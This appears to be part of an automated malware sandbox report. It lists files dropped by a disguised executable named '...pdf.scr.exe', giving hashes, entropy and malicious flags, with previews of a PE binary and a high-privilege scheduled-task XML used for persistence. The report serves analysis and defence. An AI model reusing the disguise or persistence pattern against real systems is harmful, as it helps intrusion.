                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):539
                                                  Entropy (8bit):6.237962640598812
                                                  Encrypted:false
                                                  SSDEEP:12:6Dap/0JWG75MfHN4BgfCct6W/9TM3GoUDAPt4RV:6aEWD7dkI96GNDAPt4RV
                                                  MD5:E96279C4B834A0D1348BA98595380443
                                                  SHA1:B6857B68DE2711C498632D7FAE63702F800B29A0
                                                  SHA-256:E9BC070312838661A856486A6D4433C46AB42AD7C18FA0D0D56943838B44F125
                                                  SHA-512:F267F094F2F39B2225238FB02EB1CB99EB176D6F9DC380F75CF59439D0DF6229DD5F3987377BB23D3424C92288DE86D835605CA0EA0162B4EEB2441259119A71
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):514
                                                  Entropy (8bit):6.218187584585582
                                                  Encrypted:false
                                                  SSDEEP:12:B/ZQ2hmQ7kCAxtYCU2QXbx0VgIrrkUC7GDAIh7mJbHz+t:B58DbLexFIV4GD3tmpSt
                                                  MD5:06FEEDE36DB05B3D230E3081419A19A2
                                                  SHA1:2D69F4B7F32BB925AA0CE16208F36BF5FE052F19
                                                  SHA-256:76C4B7C04D21D13CA2B8344485033B11A3631C04F9F3F0EF55C466A443EBBEAD
                                                  SHA-512:770031C2511B3A3E41CC0C0906927D5878B797A8FC5CDE7E33D725AC46934DA573F5D19C13C53C11BB1C626FED611ED2F87A377890863DD06F25ABDCA540B5A6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):744
                                                  Entropy (8bit):6.252068466825267
                                                  Encrypted:false
                                                  SSDEEP:12:pMzbyFRPpIHRufJX36MPoeyUTPg1vOlZvapSJYzD7xsgvj3IOeEwvnbkSkAQFQov:mzbyFHieJH6rtlmzapSJ47xX7DA/mJ9v
                                                  MD5:5068F342795DD0ABC182D3E210DEA3DC
                                                  SHA1:D19EF854A23175FB29C2E4477DD9FEBAACD7F113
                                                  SHA-256:1938E80FD584E5F0AEA8FB71CEC826411B8E69F8541EAE8C820315462A9053B3
                                                  SHA-512:BECF5BF96FBEF2F4809E62DF6DC7B3640ACBE2AE76CADA9E912BE9ABFE02F394C694D864318699B6AFF1CAE3A7B597A1929F7AB5C4D630127DEB7A0F7F070600
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):698
                                                  Entropy (8bit):6.258683715544326
                                                  Encrypted:false
                                                  SSDEEP:12:VD+CEZtzDSITZIvJD7zmPAa0U5O6sr2mXd6GhVYNTx9+LiKyjfftWBdd:ArfScIvJ3SPP5O6s8GhsT3+LyLtsd
                                                  MD5:DBC9AC22BDEEB8CD96BBAECD453652C1
                                                  SHA1:089BD73581553744ADBA703B7254B0238C8C3E30
                                                  SHA-256:1F9293BE18FEB28F2FB505E0C14660FD0CE8930A5FB8644EB908F187643C9C07
                                                  SHA-512:BFD581BDE6C31E4F67EC5A1302F4B80756979A468B2C13DF24B67041D31B8D4DB9006598DACEF5B299D0A6DC1E809EF6AE7A99176E313E756DF89C0013EEE574
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):624
                                                  Entropy (8bit):6.242263123832009
                                                  Encrypted:false
                                                  SSDEEP:12:ZgDtdbmShRjjA6D1IDDjUzIDZMo1S5Rn21D5akY/B15v:eDtdiSvjbGUUDZH1S5BUlcjx
                                                  MD5:C516FA4A75BF057057BE211416395C0F
                                                  SHA1:04E8F9798E788912ED41BEC8BBB0DF98662D5271
                                                  SHA-256:D897EE20C42EE8D2DC2E1950F12FB254C62931DBC840D971FF26E45967045771
                                                  SHA-512:69D91E298BC4619AEBADDEBFACAFA49BE66C1182F28CC91D83E98702B4E3213458A0A83B9DA15AB5B521EAFEA3CE07983A0185BB7A3B867BDB310E4713D78594
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):523
                                                  Entropy (8bit):6.198216479466076
                                                  Encrypted:false
                                                  SSDEEP:12:15QbzLiR3mkusiHTHvYHC5qMXzyOWPz/wZdOyGhKPw/PcherOa:LQW3mQkAi5qOGyCEmchED
                                                  MD5:DCC586BBC725E3FFB47CADEE31309C8E
                                                  SHA1:D3630384B5A6D579453AB671607F8E51AE9C8CDA
                                                  SHA-256:6B9C0567140D3565DD3B1D56C6B18E424DD6C1E0AE2F3DB521F234B9F108EE16
                                                  SHA-512:05A5CA6133D7558B3F95278C01084540CEDE28BE9B34DB1AF0D4DA14EC8615EBA57D4A46CA272D94A95052CC471077421D6B3ED01DC879FA6E2FB34726DE92A2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):936754
                                                  Entropy (8bit):6.601305917045285
                                                  Encrypted:false
                                                  SSDEEP:24576:cYgAon+KfqNbXD2XJ2PH1ddATgs/u2karPK:c37+KSbq5e1diEnHam
                                                  MD5:8A57722EC9067FAAA9FF2980C5F02838
                                                  SHA1:F528308591C99004567DD76123E6D241ECDB5817
                                                  SHA-256:3097D4413844FA305E10FB19DA3086848F2F3715B5B877E2F8691997BC25CD25
                                                  SHA-512:27DFCA42250C1A0959023E9EB586CFE69BDA8166E5DE7C775370C30620D0E5E3515EBB85CC75AD57E7DBD65AE1612DD29CFD520B12BE64CD5C6EAE677A06A5AC
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 46%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."..........~....................@..........................p.......P....@...@.......@.........................|....P..................X&......Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........P......................@..@.reloc..Pv.......x..................@..B................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):537
                                                  Entropy (8bit):6.2210381148806615
                                                  Encrypted:false
                                                  SSDEEP:12:cMSRrTZ3kkt6JJy9Lidiius2n4Hoboa5hPb1K9rL3XMd+Y1:cMSRrV3T/xiT64uoOjgtL3XM84
                                                  MD5:DECFF247A10D1AB7F53AA5D798ECA2F7
                                                  SHA1:E5DB2B53CB14488EC5EDD81D7CDE5FA53A11E837
                                                  SHA-256:AC3428221792D658F6690BAB568201DB966D220EBB29E3426877941810DA4A96
                                                  SHA-512:34272C48FFDA25F4C05CF0DF5FFA56D7B99EF09E4A2C2468739BA03C93D4EF171A1CE56E33C0E3CAD791E67E5079F6B5BCAD5E683B74FD615E60CF34CC02B0CD
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):506
                                                  Entropy (8bit):6.2100184686076965
                                                  Encrypted:false
                                                  SSDEEP:12:04/uII8/4p0YqXRhMeXVfbpc6HumsDS1cAuzj:5GD8/4p0YARaexp7umoSI
                                                  MD5:0F4EF68A2745715CF4B89D383968D0EB
                                                  SHA1:50D039BF131F5F11EC21E7EEBF7E22B81937C0A5
                                                  SHA-256:173AA7C8B7671410C3F73767A1DFE2711403B3F045DBF9825BDB115BF13B2D8F
                                                  SHA-512:2DC45A2B0BA4E58486B6BF128D7C91B00B732A1A2BBBB4CC90369E70DF7A654350FC2854E99B0DEA9B53ADDF2EE68BB97AB4F278247A4F3C486F43710950A226
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):524
                                                  Entropy (8bit):6.220072157041624
                                                  Encrypted:false
                                                  SSDEEP:12:IB7l5Fye8aehibvAui24ti7a/7skAywESg:IxcFb8obh3skA/Et
                                                  MD5:DDAA651BD0ED9660CE485161F3DA0A31
                                                  SHA1:F209147B7A434D9FF63997C57634694DD51E70C5
                                                  SHA-256:6688EA36289339B7E8ABC74401F8338F14C7B824BEA4C56ACDEAE1082228B693
                                                  SHA-512:966681795DF387F155F8D27D61AA4917E30F4A49E28B375700FBBBCA2F02AB45E5970891327795A0892B7466B412CEC537177D125251D983AA53A460176BBE05
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):515
                                                  Entropy (8bit):6.204575666587385
                                                  Encrypted:false
                                                  SSDEEP:12:4r0qRbHsWBKiUtlBQ9+6t5pAaFJukpJ5Hx+pWpZe30ANx:4rRHsWUiIobppz3pR+pWve30A3
                                                  MD5:C43B0D8E855F60BC8988C239AE91430E
                                                  SHA1:38A9CC908239A6174A8C6CDD07DF2E65ED03C557
                                                  SHA-256:F63FD422159E07439272BB6B603C3EB696C785AED53DBB0C693F9A9343869B89
                                                  SHA-512:A7889E83FDA300933D47A34FA927EC0059BDFB518707DF227C157A82320A6E28189B8F88803DF45CE1C0FE6080E89FE034D84F8F1F7E0D044C4FCDE181AB59DE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):664
                                                  Entropy (8bit):6.212535146320597
                                                  Encrypted:false
                                                  SSDEEP:12:uuIc8nn8GGMe+xg0IKcrRR6Th9dZ73G/jaPCOtQwPGtMRZAV1uav:uuIc8V0+xgFvzm9dF3G/GVpY1t
                                                  MD5:165255E5120FD4986C2B288F9FCAB09F
                                                  SHA1:8CB0C248BB9A4BA714EA6739C74C1DE960BC7343
                                                  SHA-256:CD7EC8254B748B3FE738147E27DF2FD3F7643D02835A46B15E93ECD060D06581
                                                  SHA-512:AF748CC3EE4BA6747ABA50BE8AE6D568B7E913BBB33678C2E1116B4AA9AB14F7AB5860922223E62B3E6D9D3F72D81AE773D73EF3FE0CC0BA4069261E45280C26
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):36396
                                                  Entropy (8bit):5.572411470115854
                                                  Encrypted:false
                                                  SSDEEP:768:JF/d5vD40//MnSKd5+GcpEl51vx6q91kB6S9nxIBAIU9Fd9jVvAyAg3thc:HPLQdYpElIqHkB6SsBDylaLg9hc
                                                  MD5:3016649ED3E9A031DA118886A15144F7
                                                  SHA1:58913D264B171A708F3AB825B14C096E47112677
                                                  SHA-256:429880966442E56D685B62933A30BB780092C5B664C7E546AEA2B3CAB49945CE
                                                  SHA-512:6C8EFD796609CDE371A5FA01B579742CF877CC1C604B933C09F52FB01D501C16E84AB1ADAD121B43C65D1EB88FBA6F1528E832D51E8AF7360EC120EDB9E0D5EB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):739
                                                  Entropy (8bit):6.2201318566424275
                                                  Encrypted:false
                                                  SSDEEP:12:jg/w0bWJnCzp5tnSA/hVmT6beGfLZKUTyD+wh5z6Wcg7ycQuzV7TWu2xD:juwbnap5siiT6vZD6jz6WMcQAi
                                                  MD5:5B2FFEFEDF016705B02E548D343BD273
                                                  SHA1:71C0005C0BB5259D7A8DF04607DB55E1DC48CFDF
                                                  SHA-256:AE355FD9415586E5D427089E8E8E279A6F1BAAAC4CE24A9FA2039F0B9598BAD8
                                                  SHA-512:BF6146C8C199501B43B2ADBED4A87E812B2E1A00C7E6D24FC2DFA81B47C5B1A85A3E7B189209EE571B33F57DDAA52159C77D91B621AB25EF87DC6E4F2670DB50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):625
                                                  Entropy (8bit):6.227007206665302
                                                  Encrypted:false
                                                  SSDEEP:12:/bBc8DsAO60OpRKP5WQBpnOjhF0BCynUZEz6i5eQbGcb5x6MniiIAa:D9zpRMbEjhOBT0EjeQtX6Miea
                                                  MD5:EA84F04FF07EFE4DD573DF81C8D73112
                                                  SHA1:56C7C452FDF7EC05DF7EEED80019520B4636636E
                                                  SHA-256:51948EA1E1786F3639B5688CF099946AFEEC48A6DB2B4151E2340CDA19113607
                                                  SHA-512:58EC762815FBB2D3A15FA06610B19017BC7B30D8868E968B93F5478908BEBA2B72551D784A8630835E7F9D50C047FA64452F4B212F4B6430D554A710FC8B9C22
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):523
                                                  Entropy (8bit):6.2469950217286945
                                                  Encrypted:false
                                                  SSDEEP:12:MREuUZDYGXGpGzsyc8eo4jCEicYevV344JQ8LbHpQFPKs:E5G2Jyc8UCNsI4JQuJQFCs
                                                  MD5:2E80CBC3177C60A2048EFD086D26DB0C
                                                  SHA1:60011CEE58CDCE00026D09516C147445A399265C
                                                  SHA-256:ADB88228E475C736251FD3A11BC7FB41F536FC8F0B80EA7C977153C054AB48FB
                                                  SHA-512:A8DD351B67BEC96AA68512833DD76FF7B02757ACFF82758C93CA4F3D22F98436399FAB1D9E50D9E25C66993A35DE7649207278C49E80B4D0F3683AA3914F32EA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):540
                                                  Entropy (8bit):6.191048141141158
                                                  Encrypted:false
                                                  SSDEEP:12:7OguD7Nc+8a2rZvnUqyLbSWfhCSl7EF07V4OEnz9T6eJpsjchWZPODQm9y:7Zui+8a2rVVyLbRISl95DEnz9+en9gqy
                                                  MD5:BD2C67C8D59FE4FA46C2BD40B65F2014
                                                  SHA1:303E8754D55A90565DC43581367644F3CF7F3A7A
                                                  SHA-256:3AC63CC62CAEB2B9CA24141616FA10AEF0C64EA6721AB16B8B3E33878B09098D
                                                  SHA-512:40A0D3D8C56F68908B273B532825E9F79BE73DFBBC02CBF0CDC72E4572CADF7837D36F5C75CB1BFDF2D87B39FC0EDE366D45AEEB0B37A80FD8A0968F24259117
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):620
                                                  Entropy (8bit):6.216440012089495
                                                  Encrypted:false
                                                  SSDEEP:12:KmsJX62KCMdStvQy6ws9M7odswOngZIl7tSghIbCFDbfCEvM4cW1PYDAePA4o:K1562KKIXws9ywOBlsghbf9M4cwZ
                                                  MD5:B4D931185A25EC221C09C2E0C7DE0409
                                                  SHA1:3580DF306627E9BE85243FDDE91165A24279273A
                                                  SHA-256:508D3E6C83EF0A34BEBB22F6EE99B11A7214CED3E0748D1D4C751ACA8CCA7C71
                                                  SHA-512:48E022E2ABCF790F95E1198523262EBBAE541C428A090E0D715F502CDBEDFD880B1EAC69AB5528A9055D845D9B722F30D08F0D0FEC2F1616F28403BDFDB6239F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):109765414
                                                  Entropy (8bit):7.149822507862373
                                                  Encrypted:false
                                                  SSDEEP:786432:jeiFTzFm2V+Ws11rx9irns45XQ0bWPu1EOi6h7ReyeLCD5oAD4Fk/YhswDvybX7+:E
                                                  MD5:1A4F87FE68FAF07769D93372246F7315
                                                  SHA1:756DBF9A1C5C60FA13B3285DF696C370C117A9AD
                                                  SHA-256:AE5869183348BB70CDF4745B2629425B3DC5B9A96A9DCDE7862AC9F0BC97E346
                                                  SHA-512:6C67055DB74FEEEFB9C03B2EA25DEB0680ACE4A9421AC0C458EA7AE4EC17CE24D093F47F7C43AA6553071994AADDCCA0BFF348B751AE7EBCCA6400009C097B2F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):515
                                                  Entropy (8bit):6.204797250067207
                                                  Encrypted:false
                                                  SSDEEP:12:kXIjadX52agNuuF0Qc4fR1a7EUOAH4MKITBawUQTHl:ktX5xgNuNxURobwMKIlZF
                                                  MD5:62058854A3A0211391D23AFE642D51C5
                                                  SHA1:4333B74DCE3F8564D4156F2D11B66069EE3372F2
                                                  SHA-256:D8E824CBC1D0F179F3733A2B5508200335A6EC646226F0B023E9FB4F94EA6CDE
                                                  SHA-512:FC32610AFF79A33A8BF60624F36AFB4F705C22CFF0FD04C764DA1785EBCE3C69B2DEC865D43D73EC8A9A8F1296836AF73D94681CA1E589EB6423D453D921ABD2
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):550
                                                  Entropy (8bit):6.251960168682925
                                                  Encrypted:false
                                                  SSDEEP:12:/yLLQ8dGYT/PD4jifw5AFTdBvnOh8LEUvXbkM/:KLLPdp/PDeUw5ArBvOh+7kc
                                                  MD5:9F994AFD9BB142AB8A36D4C58F102F93
                                                  SHA1:8DCB457E7F5EC4BB6B7E32305DD26A4F8D2A681E
                                                  SHA-256:BD5CD1567D60D85D393A1DDCA22A737C89C1B3A3E5A7F8A772BFDE48B8CEA3B6
                                                  SHA-512:BFA1BF3B846EFFFA96A48E91AE6A73E014F74D3459870979EB1117723D88928F8A183723AE5A5A2DA80301F3AFC6B50870E447252D1944664887C375E735ED13
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):568
                                                  Entropy (8bit):6.181793571320447
                                                  Encrypted:false
                                                  SSDEEP:12:4SJXAaJc93zJwGBv1ofBoOzwyc6it/ShtmACzggy+DjyJ:JQaJm39wi8DzRddMAC7PyJ
                                                  MD5:7D0D7010210F47BBC571277006C8C174
                                                  SHA1:73ED48688E61A32FC3A92E1099C411825FF5E59A
                                                  SHA-256:814C2970E6246BF86415067D9780E8E2F1DD9EAF947C6BC425A815E749A08042
                                                  SHA-512:CC91B14EC49EB15FD9F140C30D5321A42417C1F4C6C81222746A7A616AF83B9FEE4FCF4F8CAEE203688A08C6D1C6D3B74E4D9F6AEB4B1B50F3813F57387A0434
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):659
                                                  Entropy (8bit):6.246268360923076
                                                  Encrypted:false
                                                  SSDEEP:12:RUGtgFsr3B1AMOed5A3CEm5s6K6l5/FuMOkJ7vzu5hgrr/YoBVw1G+uD:CGtVr3B83C7s6NPuPVhg3zw1Gf
                                                  MD5:166AD43D9C2CA35E2F55412A6ED8B515
                                                  SHA1:5A5E8831BABF7E9FC4233417AA04046D45FFFC57
                                                  SHA-256:4CB41D553941E698BD92DD077AE3CCE0E4ECA9DCCA9EAF2C3EA76C48C3A9A26E
                                                  SHA-512:135E04042383237D766F1FB3CEC42C9E9400C71C34A8F0D7B46CBBD594189DD186507DA05E5DB8E71121FA57E7A74E6B38FACB424038CC65D993BE1EAF8D91DB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):603
                                                  Entropy (8bit):6.243174528289961
                                                  Encrypted:false
                                                  SSDEEP:12:brw87rpvWqPZNtLlQN1MxCRQqw5ShuQYL2ptJ7BTmhFKAPN6bjEr2JM02Wb6rRn:brw87VeuzfQN1sCRQqCOUMtXUk1jhxGt
                                                  MD5:02C0FBC15743BE076F645E223C92ACCB
                                                  SHA1:76DB0F874C4462B5DED61D9104FCEC0E3C95D273
                                                  SHA-256:C74821B50B9A993F24F4BB8788FF69A77A96C4A19DE69711564C26103D6D3F68
                                                  SHA-512:E6CE845F43A37429DA29690951780958EFD7F95CA1AAE1D2D9F8146B93419C8DDFF0750A8F29127E3B89482890075964843C3D17C5FDC08704CD6E6079CE4DAC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):555
                                                  Entropy (8bit):6.222922480311702
                                                  Encrypted:false
                                                  SSDEEP:12:BRudpgMXWpbVanAogLyE9387xsqwp7kxG8f5bUxjl:BkDWpbVanAo9EB8V/wpgA8f5bUJl
                                                  MD5:CE86D4806786B5285DC23D378067A353
                                                  SHA1:0D61DE00AC334DCBDA6B3E320E880DFADB2482C3
                                                  SHA-256:24FD150DC97AC04C8D9AA8F482A994788D5B77578B16B6028B9980249FC724A8
                                                  SHA-512:6ADE617608EB8453DEB3E43FBA45A1F3B39D6D7C78809CE9504676ECAD7CDE8F1B59BFC79C561E9687AE13FF5F359EBFE3C4DD198207298BEA25E530D412DEC3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\Desktop\026910003102350.pdf.scr.exe
                                                  File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):612
                                                  Entropy (8bit):6.20969596633477
                                                  Encrypted:false
                                                  SSDEEP:12:ZRlLCc8+8GvDRpsxyyNPPHO8VJG1tK3vtueUUtCn2I1sa0Jxun:Z6cftWyypPuB8wiCtF0Jxun
                                                  MD5:55F53F4F242C0DB1E519E3E72DEED805
                                                  SHA1:E9B4CC8F1401B641B5ACA044BF0379C1C2D653F4
                                                  SHA-256:8E858683D645E559E93B7F3C2AD65E847A2EAAADF434190AC8278DDE580BA874
                                                  SHA-512:A4EEF16E2C05DAA7100DCBA1C6044D3333BB947DC79EE66817EF5394E8355686A2A51A0C0F2BE1DE917EDC7E9AD663F34E49380709F356499C95683651951A78
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Process:C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe
                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):45152
                                                  Entropy (8bit):6.149629800481177
                                                  Encrypted:false
                                                  SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                                  MD5:2867A3817C9245F7CF518524DFD18F28
                                                  SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                                  SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                                  SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1309
                                                  Entropy (8bit):5.0990514427386
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK04kxtn:cbk4oL600QydbQxIYODOLedq35kj
                                                  MD5:77AF6D1744407EBD7E0CEC16F3C7168D
                                                  SHA1:FF4E58917D1AB719E40C68542F663121299DAE67
                                                  SHA-256:A519EB5414D05AC7565B5399D9F1EF717D6846695221B21B51820AA69120EDDC
                                                  SHA-512:529FD47B0605315DDD60D10A99A4830C234C5046C9EE575524C3FC85105C701DCD8EEA4F2A1D8AE444D2E42A2CEF37CE23FB9A2BAF4CB0BAA91B590FB555E691
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1310
                                                  Entropy (8bit):5.109425792877704
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                                                  MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                                                  SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                                                  SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                                                  SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                                                  Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8
                                                  Entropy (8bit):3.0
                                                  Encrypted:false
                                                  SSDEEP:3:ZSp:Q
                                                  MD5:6C844091DCB061AD2B62761D1939F235
                                                  SHA1:813C89B6606B3A5510FD924A02BAFCC6FE2B8574
                                                  SHA-256:FBC2997715CCA9BD5F3F08FB0FABD33DD3D13489C40E47952208ED854127AA2C
                                                  SHA-512:62CE0F17F06E366D2CBE8C1C73569D39D50BA3EB2403C8AAD48314B213166A3DC5538375992D3FD99827565B720B029244379A854EAA189EE3B0E0F33D50D665
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:Fb..7..H
